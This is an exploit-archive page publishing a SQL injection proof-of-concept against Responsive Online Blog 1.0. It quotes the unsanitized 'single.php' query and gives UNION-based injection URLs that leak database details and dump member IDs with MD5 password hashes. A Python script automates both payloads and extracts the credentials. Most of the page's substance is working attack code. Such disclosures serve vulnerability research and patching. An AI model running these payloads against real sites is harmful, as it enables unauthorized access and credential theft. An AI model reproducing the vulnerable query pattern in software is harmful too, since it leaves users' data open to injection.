Responsive Online Blog 1.0 SQL Injection

Responsive Online Blog 1.0 SQL Injection: Posted Jul 12, 2020; Authored by Eren Simsek, gh1mau; Responsive Online Blog version 1.0 remote SQL injection proof of concept exploit. Original discovery of the vulnerability is attributed to Eren Simsek.; tags | exploit, remote, sql injection, proof of concept; SHA-256 | 5d4e52cdfc0782058b4f1fff1fc1f00d68fa727957fdb3a9694863b72b170b6c; Download | Favorite | View

Responsive Online Blog 1.0 SQL Injection

# Exploit Title: Responsive Online Blog 1.0 - 'single.php?id=' SQL Injection
# Date: 2020-07-03
# Exploit Author: gh1mau
# Team Members: Capt'N,muzzo,chaos689 | https://h0fclanmalaysia.wordpress.com/
# Vendor Homepage: https://www.sourcecodester.com/php/14194/responsive-online-blog-website-using-phpmysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14194&title=Responsive+Online+Blog+Website+using+PHP%2FMySQL
# Version: v1.0
# Tested on: PHP 5.6.18, Apache/2.4.18 (Win32), Ver 14.14 Distrib 5.7.11, for Win32 (AMD64)

Vulnerable File:
---------------- 
single.php

Vulnerable Code:
-----------------
line 4: $id=$_REQUEST['id']; $query="SELECT * from blogs where id='".$id."'"; $result=mysqli_query($GLOBALS["___mysqli_ston"],$query) or die ( ((is_object($GLOBALS["___mysqli_ston"]))? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ?$___mysqli_res : true))); 


Vulnerable Issue:
-----------------
$id=$_REQUEST['id'] has no sanitization

POC:
----

[Basic Info]
http://localhost/resblog/single.php?id='+UNION+ALL+SELECT+NULL,CONCAT_WS(0x3a,version(),database(),user()),NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-

[User Credential Enumeration]
http://localhost/resblog/single.php?id='+UNION+ALL+SELECT+NULL,CONCAT_WS(0x3a,memberID,passMD5),NULL,NULL,NULL,NULL,NULL,NULL,NULL+FROM+membership_users--+-

Python POC:
----------
import requests,re


URL = input("URL : <Ex: http://localhost/resblog>\n")
vulnFile = "/single.php?id="
payloadA = "'+UNION+ALL+SELECT+NULL,CONCAT('gh1mau',version(),0x3a,database(),0x3a,user(),'gh1mau'),NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-"
payloadB = "'+UNION+ALL+SELECT+NULL,CONCAT('gh1mau',memberID,0x3a,passMD5,'gh1mau'),NULL,NULL,NULL,NULL,NULL,NULL,NULL+FROM+membership_users--+-"

#print("\nPayload Testing : \n" + URL + vulnFile + payloadA + "\n")
pattern = "(?<=gh1mau).*?(?=gh1mau)"

rA = requests.get(URL+vulnFile+payloadA)
version=re.findall(pattern,rA.text)

print("Basic Info:")
print(version)

rB = requests.get(URL+vulnFile+payloadB)
user=re.findall(pattern,rB.text)

print("\nCredentials:")
print(user)

Top Authors In Last 30 Days

Red Hat 232 files
indoushka 159 files
Jay Turla 150 files
Ubuntu 64 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,120)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,142)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,780)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,828)
UNIX (9,454)
UnixWare (188)
Windows (6,766)
Other

Responsive Online Blog 1.0 SQL Injection

Responsive Online Blog 1.0 SQL Injection

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Responsive Online Blog 1.0 SQL Injection

Share This

Responsive Online Blog 1.0 SQL Injection

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems